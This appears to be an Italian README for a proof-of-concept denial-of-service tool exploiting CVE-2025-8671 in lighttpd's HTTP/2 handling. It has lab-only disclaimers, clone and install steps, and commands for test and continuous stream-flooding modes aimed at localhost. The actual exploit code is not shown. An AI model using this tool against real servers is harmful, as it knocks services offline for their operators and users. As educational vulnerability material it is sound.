
PoC educativo per la vulnerabilità CVE-2025-8671 (DoS HTTP/2 su lighttpd). Da utilizzare solo in laboratorio locale.
Autore: @abiyeenzo
Questo progetto è fornito solo a scopo educativo. L'esecuzione del PoC contro server di terze parti può costituire un attacco informatico illegale e comportare azioni penali.
Utilizza questo script solo nei tuoi ambienti di test o laboratori locali.
Questo script permette di:
lighttpd è vulnerabile alla falla CVE-2025-8671 (HTTP/2 DoS).lighttpd.--count).--continuous) fino all'interruzione con Ctrl-C.rich per una maggiore leggibilità.git clone https://github.com/abiyeenzo/CVE-2025-8671.git
cd CVE-2025-8671
pip install -r requirements.txt
Python 3.10+ raccomandato.
python3 main.py -h
python3 main.py <host> -t
python3 main.py <host> -c
--count <numero> : Numero di flussi HTTP/2 da inviare (predefinito 20)--continuous : Modalità continua fino a Ctrl-CEsempio:
python3 main.py 127.0.0.1 -c --count 50
python3 main.py 127.0.0.1 -c --continuous
Non eseguire questo script contro server esterni. È fornito solo per apprendimento e test in laboratorio personale. L'autore declina ogni responsabilità in caso di uso improprio.
rich>=13.0.0h2>=4.1.0